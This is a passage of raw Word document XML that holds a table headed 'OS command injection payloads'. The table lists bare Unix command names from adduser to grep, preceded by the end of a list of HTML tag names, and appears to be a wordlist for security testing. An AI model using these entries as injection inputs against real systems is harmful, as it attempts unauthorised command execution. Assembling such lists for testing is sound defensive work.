              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>var</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2059AE7E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>video</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="740B84E8" w14:textId="2B87D36B" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>wbr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BCB96E5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE2ED36" w14:textId="1DB1A3D7" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>OS command injection payloads</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C3F72" w14:paraId="2FB2A63D" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3331C6DF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>adduser</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17A728AA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>addgroup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02CFB876" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>agetty</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E42AE8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>alias</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D4EEE49" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>anacron</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68183591" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>apropos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03CBEDB8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416B70DA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>apt-get</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D54033" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>aptitude</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D0CB8AB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>arch</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C1577A6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>arp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E9BFB24" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>at</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10FE53D8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>atq</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07E34F0D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>atrm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365C6770" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>awk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F8F2A1" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>batch</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1680D425" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>basename</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6757581F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>bc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CDC7E72" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>bg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51EBA571" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>bzip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5836CB92" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>cal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="492C92FB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>cat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E0F7316" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>chgrp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41BEECE8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="549358EC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>chown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33C72B01" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>cksum</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AC993F6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>clear</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223E32F7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>cmp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4735E51A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>comm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79A2F933" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3F02CC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>date</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185B5442" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>dd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02BC1D1B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>df</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B53FF9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>diff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1563D88D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32776052" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>dmidecode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28B702D8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>du</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF4DA85" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6FEB6F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>eject</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A7CB9E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>env</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="173B36BB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55AF5E9A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>expr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43CD1C67" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>factor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC768D2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>find</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330D0C1E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>free</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1696ADD9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>grep</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D98143B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
